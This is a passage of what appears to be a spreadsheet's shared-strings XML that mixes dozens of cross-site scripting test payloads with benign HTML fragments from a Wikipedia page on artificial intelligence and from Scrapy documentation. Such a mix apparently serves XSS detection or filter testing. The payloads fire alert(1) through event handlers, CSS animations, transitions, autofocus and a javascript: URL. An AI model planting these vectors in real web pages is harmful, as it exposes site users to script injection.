    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;dir style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;kbd onpointerenter=alert(1)&gt;XSS&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Having trouble? We’d like to help!&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;input onmousedown="alert(1)"&gt;test&lt;/input&gt;</t>
  </si>
  <si>
    <t>&lt;body draggable="true" ondragstart="alert(1)"&gt;test&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;br draggable="true" ondragend="alert(1)"&gt;test&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;menu draggable="true" ondragenter="alert(1)"&gt;test&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;canvas onkeypress="alert(1)" contenteditable&gt;test&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;sup onmouseover="alert(1)"&gt;test&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;head onkeydown="alert(1)" contenteditable&gt;test&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;wbr onmouseover="alert(1)"&gt;test&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;main onpointermove=alert(1)&gt;XSS&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;embed onkeydown="alert(1)" contenteditable&gt;test&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;input id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/input&gt;</t>
  </si>
  <si>
    <t>&lt;rtc onblur=alert(1) tabindex=1 id=x&gt;&lt;/rtc&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">      });</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTELangley2011-177"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTELangley2011_177-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation book"&gt;Matti, D.; Ekenel, H. K.; Thiran, J. P. (2017). &lt;i&gt;Combining LiDAR space clustering and convolutional neural networks for pedestrian detection &lt;/i&gt;. &lt;i&gt;2017 14th IEEE International Conference on Advanced Video and Signal Based Surveillance (AVSS) &lt;/i&gt;. pp.&amp;#160;1–6. &lt;a href="/wiki/ArXiv" title="ArXiv"&gt;arXiv &lt;/a&gt;:&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//arxiv.org/abs/1710.06160"&gt;1710.06160 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;blockquote id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/blockquote&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:7.5em"&gt;Medieval &lt;/th&gt;&lt;td class="navbox-list navbox-even" style="text-align:left;border-left-width:2px;border-left-style:solid;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;iframe src=http://.rocks/scriptlet.html &lt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;Mahdawi, Arwa (26 June 2017). &lt;a rel="nofollow" class="external text" href="https://www.theguardian.com/us-news/2017/jun/26/jobs-future-automation-robots-skills-creative-health"&gt;"What jobs will still be around in 20 years? Read this to prepare your future" &lt;/a&gt;. &lt;i&gt;The Guardian &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;13 January </t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;div class="printfooter"&gt;Retrieved from "&lt;a dir="ltr" href="https://en.wikipedia.org/w/index.php?title=Artificial_intelligence&amp;amp;oldid=945778352"&gt;https://en.wikipedia.org/w/index.php?title=Artificial_intelligence&amp;amp;oldid=945778352 &lt;/a&gt;" &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;Looking for specific information? Try the &lt;a class="hoverxref reference internal" data-doc="genindex" data-project="scrapy" data-section="" data-version="latest" href="genindex.html"&gt;&lt;span class="std std-ref"&gt;Index</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. McGraw-Hill. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-07-052261-9" title="Special:BookSources/978-0-07-052261-9"&gt;&lt;bdi&gt;978-0-07-052261-9 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Artificial+Intelligence&amp;amp;rft.pub=McGraw-Hill&amp;amp;rft.date=1983&amp;amp;rft.isbn=978-0-07-052261-9&amp;amp;rft.aulast=Rich&amp;amp;rft.aufirst=Elaine&amp;amp;rft_id=https%3A%2F%2Farchive.org%2Fdetails%2Fine0000unse&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;IMG SRC=javascript:alert('')&gt;</t>
  </si>
  <si>
    <t>&lt;div role="navigation" class="navbox" aria-labelledby="Philosophy_of_mind" style="padding:3px"&gt;&lt;table class="nowraplinks hlist mw-collapsible autocollapse navbox-inner" style="border-spacing:0;background:transparent;color:inherit"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;th scope="col" class="navbox-title" colspan="2"&gt;</t>
  </si>
  <si>
    <t>&lt;param id=x tabindex=1 onactivate=alert(1)&gt;&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;div id="mw-fr-revisiondetails-wrapper" style="position:relative;"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;applet id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/applet&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:7.5em"&gt;Contemporary &lt;/th&gt;&lt;td class="navbox-list navbox-odd" style="text-align:left;border-left-width:2px;border-left-style:solid;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Physicalism" title="Physicalism"&gt;Physicalism &lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;button id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;strike onkeydown="alert(1)" contenteditable&gt;test&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;map oncontextmenu="alert(1)"&gt;test&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;acronym onpointerover=alert(1)&gt;XSS&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;keygen draggable="true" ondragleave="alert(1)"&gt;test&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Instrumentalism" title="Instrumentalism"&gt;Instrumentalism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;i&gt;&lt;a href="/wiki/Nature_(journal)" title="Nature (journal)"&gt;Nature &lt;/a&gt; &lt;/i&gt;. &lt;b&gt;550 &lt;/b&gt; (7676): 354–359. &lt;a href="/wiki/Bibcode" title="Bibcode"&gt;Bibcode &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://ui.adsabs.harvard.edu/abs/2017Natur.550..354S"&gt;2017Natur.550..354S &lt;/a&gt;. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1038%2Fnature24270"&gt;10.1038/nature24270 &lt;/a&gt;. &lt;a href="/wiki/International_Standard_Serial_Number" title="International Standard Serial Number"&gt;ISSN &lt;/a&gt;&amp;#160;&lt;a rel="nofollow" class="external text" href="//www.worldcat.org/issn/0028-0836"&gt;0028-0836 &lt;/a&gt;. &lt;a href="/wiki/PubMed_Identifier" class="mw-redirect" title="PubMed Identifier"&gt;PMID &lt;/a&gt;&amp;#160;&lt;a rel="nofollow" class="external text" href="//pubmed.ncbi.nlm.nih.gov/29052630"&gt;29052630 &lt;/a&gt;. &lt;q&gt;AlphaGo Lee... 12 convolutional layers &lt;/q&gt; &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Nature&amp;amp;rft.atitle=Mastering+the+game+of+Go+without+human+knowledge&amp;amp;rft.volume=550&amp;amp;rft.issue=7676&amp;amp;rft.pages=354-359&amp;amp;rft.date=2017-10-19&amp;amp;rft_id=info%3Adoi%2F10.1038%2Fnature24270&amp;amp;rft.issn=0028-0836&amp;amp;rft_id=info%3Apmid%2F29052630&amp;amp;rft_id=info%3Abibcode%2F2017Natur.550..354S&amp;amp;rft.aulast=Silver&amp;amp;rft.aufirst=David&amp;amp;rft.au=Schrittwieser%2C+Julian&amp;amp;rft.au=Simonyan%2C+Karen&amp;amp;rft.au=Antonoglou%2C+Ioannis&amp;amp;rft.au=Huang%2C+Aja&amp;amp;rft.au=Guez%2C+Arthur&amp;amp;rft.au=Hubert%2C+Thomas&amp;amp;rft.au=Baker%2C+Lucas&amp;amp;rft.au=Lai%2C+Matthew&amp;amp;rft.au=Bolton%2C+Adrian&amp;amp;rft.au=Chen%2C+Yutian&amp;amp;rft.au=Lillicrap%2C+Timothy&amp;amp;rft.au=Fan%2C+Hui&amp;amp;rft.au=Sifre%2C+Laurent&amp;amp;rft.au=Driessche%2C+George+van+den&amp;amp;rft.au=Graepel%2C+Thore&amp;amp;rft.au=Hassabis%2C+Demis&amp;amp;rft_id=http%3A%2F%2Fdiscovery.ucl.ac.uk%2F10045895%2F1%2Fagz_unformatted_nature.pdf&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;br onkeyup="alert(1)" contenteditable&gt;test&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;aside draggable="true" ondragleave="alert(1)"&gt;test&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;p onpointerleave=alert(1)&gt;XSS&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFKahnemanSlovicTversky1982"&gt;Kahneman, Slovic &amp;amp; Tversky (1982) &lt;/a&gt; have shown that people are terrible at elementary problems that involve uncertain reasoning. (See &lt;a href="/wiki/List_of_cognitive_biases" title="List of cognitive biases"&gt;list of cognitive biases &lt;/a&gt; for several examples). &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Monitor and control a crawler using a web service.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Buckminster_Fuller" title="Buckminster Fuller"&gt;Buckminster Fuller &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Phenomenology_(philosophy)" title="Phenomenology (philosophy)"&gt;Phenomenology &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/style&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;noscript id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main article: &lt;a href="/wiki/Friendly_AI" class="mw-redirect" title="Friendly AI"&gt;Friendly AI &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;textarea id=x tabindex=1 onactivate=alert(1)&gt;&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;ruby onclick="alert(1)"&gt;test&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;382–387 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;menu onbeforecopy="alert(1)" contenteditable&gt;test&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;listing onmouseover="alert(1)"&gt;test&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="intro/examples.html"&gt;&lt;span class="doc"&gt;Examples</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;ul id="footer-places" class=""&gt;</t>
  </si>
  <si>
    <t>&lt;span id=x tabindex=1 onactivate=alert(1)&gt;&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;figure draggable="true" ondrag="alert(1)"&gt;test&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;sup draggable="true" ondragend="alert(1)"&gt;test&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;strong oncopy="alert(1)" contenteditable&gt;test&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;acronym oncontextmenu="alert(1)"&gt;test&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>Moving and &lt;a href="/wiki/Configuration_space_(physics)" title="Configuration space (physics)"&gt;configuration space &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;bdi onpointerout=alert(1)&gt;XSS&lt;/bdi&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="thumbinner" style="width:222px;"&gt;&lt;a href="/wiki/File:Hierarchical-control-system.svg" class="image"&gt;&lt;img alt="" src="//upload.wikimedia.org/wikipedia/commons/thumb/7/76/Hierarchical-control-system.svg/220px-Hierarchical-control-system.svg.png" decoding="async" width="220" height="199" class="thumbimage" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/7/76/Hierarchical-control-system.svg/330px-Hierarchical-control-system.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/7/76/Hierarchical-control-system.svg/440px-Hierarchical-control-system.svg.png 2x" data-file-width="596" data-file-height="539" /&gt; &lt;/a&gt;  &lt;div class="thumbcaption"&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Space_fountain" title="Space fountain"&gt;Space fountain &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;dir onkeypress="alert(1)" contenteditable&gt;test&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;227–331 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;html draggable="true" ondrag="alert(1)"&gt;test&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;noembed onmouseout="alert(1)"&gt;test&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;spacer onmousemove="alert(1)"&gt;test&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;rb style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;del id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;template id=x tabindex=1 onfocus=alert(1)&gt;&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;noscript id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/noscript&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;&lt;tr&gt;</t>
  </si>
  <si>
    <t>&lt;table onpointerout=alert(1)&gt;XSS&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;progress id=x tabindex=1 onactivate=alert(1)&gt;&lt;/progress&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEDomingos2015286-74"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEDomingos2015286_74-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Dependability" title="Dependability"&gt;Dependability &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;var id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;img id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/img&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;tbody oncopy="alert(1)" contenteditable&gt;test&lt;/tbody&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;AI is heavily used in &lt;a href="/wiki/Robotics" title="Robotics"&gt;robotics &lt;/a&gt;.&lt;sup id="cite_ref-Robotics_128-0" class="reference"&gt;&lt;a href="#cite_note-Robotics-128"&gt;&amp;#91;125&amp;#93; &lt;/a&gt; &lt;/sup&gt; Advanced </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;figure style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;frameset onblur=alert(1) tabindex=1 id=x&gt;&lt;/frameset&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;section onload=alert(1)&gt;&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;datalist onpointerleave=alert(1)&gt;XSS&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;label onbeforepaste="alert(1)" contenteditable&gt;test&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;ol ondrop=alert(1) contenteditable&gt;drop here&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;dd&gt;Machines are &lt;i&gt;already &lt;/i&gt; intelligent, but observers have failed to recognize it. When &lt;a href="/wiki/Deep_Blue_(chess_computer)" title="Deep Blue (chess computer)"&gt;Deep Blue &lt;/a&gt; beat &lt;a href="/wiki/Garry_Kasparov" title="Garry Kasparov"&gt;Garry Kasparov &lt;/a&gt; in chess, the machine was acting intelligently. However, onlookers commonly discount the behavior of an artificial intelligence program by arguing that it is not "real" intelligence after all; thus "real" intelligence is whatever intelligent behavior people can do that machines still cannot. This is known as the AI Effect: "AI is whatever hasn't been done yet." &lt;/dd&gt; &lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Interactionism_(philosophy_of_mind)" title="Interactionism (philosophy of mind)"&gt;Interactionism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;caption style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Geographic_information_system" title="Geographic information system"&gt;Geographic information system &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Backpropagation-243"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Backpropagation_243-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;hgroup onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/hgroup&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFPooleMackworth2017" class="citation book"&gt;&lt;a href="/w/index.php?title=David_Poole_(researcher)&amp;amp;action=edit&amp;amp;redlink=1" class="new" title="David Poole (researcher) (page does not exist)"&gt;Poole, David &lt;/a&gt;; &lt;a href="/wiki/Alan_Mackworth" title="Alan Mackworth"&gt;Mackworth, Alan &lt;/a&gt; (2017). &lt;a rel="nofollow" class="external text" href="http://artint.info/index.html"&gt;&lt;i&gt;Artificial Intelligence: Foundations of Computational Agents &lt;/i&gt; &lt;/a&gt; (2nd ed.). Cambridge University Press. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-1-107-19539-4" title="Special:BookSources/978-1-107-19539-4"&gt;&lt;bdi&gt;978-1-107-19539-4 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Artificial+Intelligence%3A+Foundations+of+Computational+Agents&amp;amp;rft.edition=2nd&amp;amp;rft.pub=Cambridge+University+Press&amp;amp;rft.date=2017&amp;amp;rft.isbn=978-1-107-19539-4&amp;amp;rft.aulast=Poole&amp;amp;rft.aufirst=David&amp;amp;rft.au=Mackworth%2C+Alan&amp;amp;rft_id=http%3A%2F%2Fartint.info%2Findex.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, &lt;a rel="nofollow" class="external text" href="http://people.cs.ubc.ca/~poole/ci/ch1.pdf"&gt;p. 1 &lt;/a&gt;, which provides the version that is used in this article. Note that they use the term "computational intelligence" as a synonym for artificial intelligence. &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup onmouseup="alert(1)"&gt;test&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;div class="portal" role="navigation" id="p-tb"  aria-labelledby="p-tb-label"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;keygen id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;slot onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/slot&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/selectors.html"&gt;Selectors&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; (2nd ed.). New York: John Wiley. pp.&amp;#160;54–57. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-471-50306-4" title="Special:BookSources/978-0-471-50306-4"&gt;&lt;bdi&gt;978-0-471-50306-4 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=bookitem&amp;amp;rft.atitle=Artificial+Intelligence&amp;amp;rft.btitle=Encyclopedia+of+Artificial+Intelligence&amp;amp;rft.place=New+York&amp;amp;rft.pages=54-57&amp;amp;rft.edition=2nd&amp;amp;rft.pub=John+Wiley&amp;amp;rft.date=1992&amp;amp;rft.isbn=978-0-471-50306-4&amp;amp;rft.aulast=Shapiro&amp;amp;rft.aufirst=Stuart+C.&amp;amp;rft_id=http%3A%2F%2Fwww.cse.buffalo.edu%2F~shapiro%2FPapers%2Fai.pdf&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;ins onmouseout="alert(1)"&gt;test&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Hardware_acceleration" title="Hardware acceleration"&gt;Hardware acceleration &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;dfn onpointerenter=alert(1)&gt;XSS&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>General intelligence (&lt;a href="/wiki/Artificial_general_intelligence" title="Artificial general intelligence"&gt;strong AI &lt;/a&gt;) is discussed in popular introductions to AI:</t>
  </si>
  <si>
    <t>&lt;source onkeypress="alert(1)" contenteditable&gt;test&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;details ondragover=alert(1) contenteditable&gt;drop here&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;big oncontextmenu="alert(1)"&gt;test&lt;/big&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-47"&gt;&lt;a href="#Art"&gt;&lt;span class="tocnumber"&gt;7.12 </t>
  </si>
  <si>
    <t>&lt;image2 onpointermove=alert(1)&gt;XSS&lt;/image2&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup onblur=alert(1) tabindex=1 id=x&gt;&lt;/optgroup&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;footer&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Theory-ladenness" title="Theory-ladenness"&gt;Theory-ladenness &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;option id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;table id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;tt id=x tabindex=1 onfocus=alert(1)&gt;&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;rtc onpointerleave=alert(1)&gt;XSS&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;small onpointerover=alert(1)&gt;XSS&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;content onmouseout="alert(1)"&gt;test&lt;/content&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFDomingos2015"&gt;Domingos 2015 &lt;/a&gt;, Chapter 2, Chapter 3. </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;h2&gt;Extending Scrapy&lt;a class="headerlink" href="#extending-scrapy" title="Permalink to this headline"&gt;¶&lt;/a&gt;&lt;/h2&gt;</t>
  </si>
  <si>
    <t>&lt;q draggable="true" ondragleave="alert(1)"&gt;test&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;map id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;canvas id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;img2 onpointerup=alert(1)&gt;XSS&lt;/img2&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-autogenerated1-397"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-autogenerated1_397-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-autogenerated1_397-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;dl onmousemove="alert(1)"&gt;test&lt;/dl&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;&lt;a class="mw-selflink selflink"&gt;Artificial&lt;br /&gt;intelligence &lt;/a&gt; &lt;/th&gt;&lt;td class="navbox-list navbox-even" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-415"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-415"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
